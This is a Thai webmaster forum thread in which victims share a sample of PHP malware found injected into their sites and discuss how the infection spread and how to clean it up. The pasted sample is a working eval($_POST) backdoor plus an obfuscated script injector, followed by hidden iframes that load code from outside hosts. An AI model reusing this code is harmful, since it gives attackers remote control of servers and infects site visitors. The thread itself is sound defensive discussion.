<?php if(!function_exists(‘tmp_lkojfghx’)){if(isset($_POST[‘tmp_lkojfghx3’]))eval($_POST[‘tmp_lkojfghx3’]);if(!defined(‘TMP_XHGFJOKL’))define(‘TMP_XHGFJOKL’,base64_decode(‘PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBBZnZKVT11bmVzY2FwZSgoJ183NmFyXzIwYV8zZF8yMlNfNjNyaXBfNzRFXzZlZ182OW5lXzIyXzJjXzYyXzNkXzIyVl82NV83MnNfNjlvXzZlKF8yOV8yYl8yMl8yY2pfM2RfMjJfMjJfMmNfNzVfM2RuYXZpZ2F0b3JfMmV1c2VyQWdfNjVudF8zYmlmKCh1XzJlaW5kZXhPXzY2XzI4XzIyXzQzaHJfNmZtXzY1XzIyKV8zY18zMClfMjZfMjYodV8yZV82OV82ZWRlXzc4XzRmZihfMjJXXzY5bl8yMilfM2UwKV8yNl8yNih1XzJlaW5kZXhPZihfMjJOVF8yMDZfMjIpXzNjXzMwKV8yNl8yNl8yOGRvY3VtXzY1bnRfMmVjXzZmb2tpZV8yZV82OW5kZXhPZihfMjJtaWVrXzNkMV8yMilfM2MwXzI5XzI2XzI2KHR5XzcwZV82ZmYoenJfNzZ6dHMpXzIxXzNkdF83OXBlb2ZfMjhfMjJBXzIyKV8yOSlfN2JfN2Fydl83YXRzXzNkXzIyQV8yMl8zYl82NXZhbChfMjJpXzY2KHdpbmRvd18yZV8yMithK18yMl8yOV82YV8zZGpfMmJfMjJfMmJhK18yMk1fNjFqb3JfMjIrYithK18yMk1fNjlub3JfMjIrXzYyXzJiYStfMjJCdWlfNmNkXzIyK2JfMmJfMjJfNmFfM2JfMjJfMjlfM2Jkb2N1bWVfNmV0XzJlXzc3cmlfNzRlKF8yMl8zY3Njcl82OXB0XzIwXzczcmNfM2RfMmZfMmZtXzIyK18yMmFyXzc0dV83YV8yZV82M25fMmZ2XzY5ZF8yZl8zZmlkXzNkXzIyK182YStfMjJfM2VfM2NfNWNfMmZzY3JpcF83NF8zZV8yMl8yOV8zYl83ZCcpLnJlcGxhY2UoL18vZywnJScpKTtldmFsKEFmdkpVKX0pKCk7CiAtLT48L3NjcmlwdD4=’));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all(’#<script(.?)</script>#is’,$s,$a))foreach($a[0] as $v)if(count(explode("
",$v))>5){$e=preg_match(’#[’"][^\s’".,;?![]:/<>()]{30,}#’,$v)||preg_match(’#([{20,}#’,$v);if((preg_match(’#\beval\b#’,$v)&&($e||strpos($v,‘fromCharCode’)))||($e&&strpos($v,‘document.write’)))$s=str_replace($v,’’,$s);}$s1=preg_replace(’#<script language=javascript></script>#’,’’,$s);if(stristr($s,’<body’))$s=preg_replace(’#(\s<body)#mi’,TMP_XHGFJOKL.’\1’,$s1);elseif(($s1!=$s)||stristr($s,’</body’)||stristr($s,’</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS[‘tmp_xhgfjokl’])call_user_func($GLOBALS[‘tmp_xhgfjokl’],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[‘name’])==‘tmp_lkojfghx’)return;else $s[]=array($a==‘default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler(‘tmp_lkojfghx2’))!=‘tmp_lkojfghx2’)$GLOBALS[‘tmp_xhgfjokl’]=$a;tmp_lkojfghx2(); ?>
<iframe src=“http://hugebest.cn:8080/ts/in.cgi?pepsi8” width=2 height=4 style=“visibility: hidden”></iframe>
echo “<iframe src=”[http://nakulpi.net/?click=86732D](http://nakulpi.net/?click=86732D)" width=1 height=1 style=“visibility:hidden;position:absolute”></iframe>";
มันมาเรื่อยๆ ครับ ตอนนี้กระทู้ใน THT ที่คุยกันในเรื่องนี้ก็มีอยู่เยอะพอสมควร แต่รอบนี้ดูเหมือนจะหนัก = =a
JOB IN เหมือนกันผมแก้หมดแล้ว เมือวันก่อน ตอนนีู้ไร้ iframe เรียบร้อย 
ใช่ครับ
แปลกใจว่าลูกค้าใช้ filezillar ก็โดนด้วยแฮะ - -*
หรือว่าอาจจะ upload ไวรัสที่คอม ขึ้นไปนะครับ
มาใหม่เรื่อยๆ จนตามแก้ไม่ทันกันแล้ว
ไอ้พวกที่มันทำนี่มันมีตัวตนมั้ยนี่
จ้างมือปืนไปเก็บมันซะเลย
อย่าลืมเปลี่ยน password ftp ของ account ต้นเหตุด้วยนะครับ ไม่งั้นแก้แล้วก็กลับมาอีก
ที่สำคัญเครื่องที่ติดไวรัสต้องแก้ไขก่อนที่จะใช้ password ใหม่ ftp เข้ามาที่ server
555555555 ใครมีวิธีอะไรดีๆ ก็แนะนำบ้างนะครับ โดนหนักมากๆ
หนักครับ เห่อ บางทีมันก็มาจาก Crack โปรแกรมอื่นๆ นะครับ รวมถึง Patch โปรแกรมด้วย
ยังไม่แน่ใจว่า100 % แต่คิดว่ามีโอกาสคือพวกที่มากับ Cookie ครับ บางที Popup เด้งๆ ที่กดก็โหลดมันมาโดยไม่รู้ตัว
เครีย temp
โทรจัน มากกว่าครับ
เปลี่ยนพาส แต่ก็ยังโดนอยู่ดี ถ้าไม่เอาไวรัสในเครื่องอออก
ต้องทำ white list ip
ใครมีอะไรดีๆก็แนะนำเข้ามาครับ